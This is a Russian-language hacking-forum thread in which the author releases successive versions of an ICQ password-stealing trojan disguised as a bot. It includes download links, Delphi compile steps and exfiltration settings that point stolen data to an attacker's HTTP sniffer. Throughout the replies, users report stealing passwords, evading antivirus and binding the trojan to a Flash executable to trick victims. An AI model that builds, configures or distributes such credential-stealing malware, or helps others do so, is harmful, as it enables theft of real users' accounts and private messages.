|
Релиз ICQ трояна. ver 2
Итак, приступим. Если кто то постоянно тoрчит на Античате и у него хорошая память, то он помнит что гдето месяца полтора назад я выкладывал троянца, который маскируется под ICQ Бота, а на самом деле ворует пароли (очень нехороший =( ). Примерно в воскресенье я сел с утра и начал писать вторую версию. Закончил я это дело в понедельник =). Эти дни я давал троянца на проверку разным хорошим пиплам, чтобы они нашли и сообщили мне о глюках =), теперь же я выкладываю официальную (гыгы) вторую версию троянца. Нового оччень много, но обо всем попорядку. Что добавлено/исправлено:
- Добавлен поиск по винту НЕУСТАНОВЛЕННОГО QIP. - Исправлены глючки с процедурой извлечения паролей (они были и во множетсве = ) ). - Кардинально изменен способ передачи данных. Теперь троян использует не ICQ протокол, а HTTP, а еще конкретнее библиотеку WinInet. Не палится файерами (вроде бы =) ). Антивирями тоже не палится. - Соответственно, если передача теперь по HTTP, То для троя был написан сниффер (его исходник в проекте). - Написан подробный ReadMe.txt =)))) Обращаю внимание, что программа написана в ОБРАЗОВАТЕЛЬНЫХ целях, не стоит реально украдывать ею аськи!!!! Архив с проектом качаем тутс: http://ggg123321.narod.ru/troy.rar Теперб к вопросам компиляции, после релиза первого трояна ICQ и еще одного моего троянца, мою личку зафлудили вопросами о компиляции =))). Объясняю все и всем сразу =). Ничего сложного нет!!! С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить. Далее нужно нажать ctrl-f9, чтобы Делфи скомпилировал троянца без запуска! Дальше можно оптимизировать размер каким нето пакером, но и то это будет приятное, но не обязательное дополнение. ВСЕ!!!!! Это не сложно!!!!! Если же совсем туго, то можно спросить в теме. Это не стыдно, форум для того и создан чтобы делится опытом и знаниями! Потом, у меня перебои с инетом, и я могу ответить не сразу, а в теме же это сделают пусть и дургие люди но оперативно! Авторские права принадлежат прежде всего Antichat.Ru, ну и вашему покорному слуге - А®ТеS'y. Вы можете модифироваь код, это только приветствуется, единственное чего вы не имеет права делать, это КОММЕРЧСКИ распространять программу. __________________ CopyRight Antichat.Ru 2007 year |
аффтор пость все в одном посте!
|
Кто нить качал?
|
я качал вируса не обнаружено, ещё бы суметь под себя подстроить=)
P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!! пока на работоспособность не пробовал , но всётаки |
Автору респект!!!
Выдирает даже с флешек! :eek: . Работает вроде без багов, только дельфи 7 при компиляции какой-то совет дает, а так вроде без подстав канектится на указаный сниффер. Outpost 4 резет. Каспер с доктором вебом с последними базами на момент теста неполили. Цитата:
Там на русским в исходниках написано где и что менять =))) Если не поймёшь стуки в Асю помогу чем смогу ;) P.s. даже я с первого раза все правильно скампилил ;) |
Автору респект и плюсик в репу =)
|
Привет.
Скачал троя, подключил ICQ2003Decrypt , поменял константы, скомпилил. Проверил - не пашет. возможно пролема в константах. Я их задал в формате: Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт ScriptName: PChar= 'need.php'; // имя скрипта. hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял Скрипт лежит в корневой папке, т.е. http://Myserver.122mb.com/need.php Лог файл тоже там. С уважением, bt2mf88a |
Цитата:
Код:
Server_Addr: PChar= 'Myserver.122mb.com'; |
Так тоже задавал...
|
У меня примерно так и всё работает.
Код:
Server_Addr: PChar= 'Myserver.122mb.com';Или ты просто неправильно установил компонент TICQ2003Decrypt. поставь без заглавной буквы . Код:
Server_Addr: PChar= 'myserver.122mb.com'; |
Всем спасибо, все пашет, ошибка была в подключении Unit.pas
Автору respect ;-) tnx P.s. Кстати в лог на серваке все норм пишет, а вот на почту глючный пас присылает... |
respect :)
|
Могет кто батник написать что б дельфи компилятор неискать?
|
Цитата:
|
У меня на все хосты и бесплатные и платные все пашет и на мыло все четко приходит!!!
З.ы. мыло Gmail - e. |
Цитата:
З.ы. ася 4287801 |
Слух добвь функцию для Mail.ru Agent а тоже плз, буду очень признателен, никто не знает прогу которая крадётисторию переписка ICQ и агента?
|
Короче я представляю на ваш суд обновленного троянца, версия 2.01 =). Что добавлено/убрано/изменено:
- Незначительно переработан сорец троянца Очень сильно доработан сниффер, теперь там есть: - Запись в лог IP адреса с которого все пришло - Запись в лог Даты/времени прибытия - Теперь есть админка, т.е. без знания логина/пароля лог не посмотришь =). (пароль и логин хранятся ко всему прочему в стойком md5, блин отвлекся =) ) - Внешний вид админки сниффера довольно таки цивильный, т.е. доработка дизайна =) Качаем тута: http://ggg123321.narod.ru/varlok_troy_2.01.rar Опять же напоминаю, что копирайты принадлежат Античату (AntiChat.Ru) и мне (А®ТеS'у), ты не могешь распространять программ коммерчески, доработка кода лишь приветствуется. За незаконное в рамках законодательства твоей страны применение троянца никто, кроме тебя самого ответственности НЕ НЕСЕТ!!! Если будешь пытацца протроянить админов ICQ.com, то можешь сесть по 273 - "Написание и распространение", в остальных случаях тебе грозит лишь посыл на три веселых буквы =)))). |
Цитата:
з.ы. ептыть до меня токо счас доперло что ты имел ввиду =))), короче мона сделать тырильщик логов общения, это легко =) |
А®Теs молодец, держи + ;)
|
Автор, как от этого троя избавляться? А то из-за одного *****, который выложил зараженный линк на ачате, у меня теперь это сидит.
|
да никак, он себя в автозапуск не пишет =). Запустил, пароли улетели, троян отработал и затих до нового запуска (т.е. запускуает сам юзер)
|
Ага, то есть враг народа может повторно стырить мои пароли? или как в случае пинча, только если я зараженный файл открою еще раз?
|
Только если откроешь повторно. В будущих версиях я хочу исправить данный недостаток =)))
|
Короче народ, выкладываю очередной релиз. Я исправил ошибку в сниффере (небольщая была) и доработал троянца, теперь он ко всему прочему еще и прет пароли от Mail.Ru Agent'a. Качаем тута:
http://ggg123321.narod.ru/varlok_troy_3.0.rar Большая и убедительная просьба прочесть ReadMe первым делом!!! =) Напомню про копирайты: AntiChatRu and А®ТеS |
Народ у меня вопрос а хостинги можно использовать любые (для бизнеса,рекламы или персональный сайт)? Да и посоветуйте нормальный хост а то на h17.ru неочень.
Зарание спасибо за помошь:) |
Любые. Из бесплатных ИМХО h17.ru лучший.
|
Всё замечательно работает )
Прислал все пароли, правильные, для каждого номера отдельное письмо) Пробовал версию 2,01 со старой версией снифера на платном хосте. Респект и + тебе А®Теs |
Немножко помудохавшись с компилированием, делфи таки родил мне билд, затем я его пакнул и склеил с exe'шной флеш анимашкой;). (принесло много радости ^__^ )
Не всегда нормально вытаскиваются пароли с Мейл агента и тащит кривые пароли с нового квипа (8010). А так автору респект :cool: +1 з.ы пробовал на третьей версии варлока :p |
Помогите разобраться захожу в папку компонент запускаю ICQ2003Decrypt.pas нажимаю ctrl+F9 не чего не происходит. ЗАрание спасибо!!!
|
Помогите разобраться захожу в папку компонент запускаю ICQ2003Decrypt.pas нажимаю ctrl+F9 не чего не происходит. заранее спасибо!!!
|
ман, ты должен открыть файл проекта(*.dpr), а не исходник.
если ты откроеш исходник, ты его не скомпилиш. ЗЫ: по теме=) как юзать TResourceStream? киньте примерчик в лс или сюда =) |
объясните по подробней пожалуйста как скомпилить
|
где взять TICQ2003Decrypt
|
TICQ2003Decrypt дан с трояном поищи там
|
нету такого файла всё посмотрел выложите отдельно
|
Цитата:
есть там всё!он в папке Component |
Заметил что после запуска бинарника вылетает следующая ошибка
" is not a valid integer value , палево однако, у когонть есть такое? |
Цитата:
|
Короче представляю версию 3.01. Существенных изменений нет, в основном фиксы на разные глюки =), но тем не меннее настоятельно рекомнудю скачать:
http://ggg123321.narod.ru/varlok_troy_3.1.rar |
| Время: 13:57 |